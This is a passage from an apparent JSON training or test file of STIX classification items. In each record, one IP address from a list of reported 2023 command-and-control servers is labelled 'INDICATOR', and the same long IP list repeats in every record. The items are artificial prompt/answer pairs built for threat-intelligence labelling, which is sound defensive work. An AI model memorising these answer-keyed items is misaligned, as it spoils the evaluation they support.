31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n209.97.175.128\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n167.172.69.123\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n64.227.72.210\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n68.183.200.0\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n178.128.16.170\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
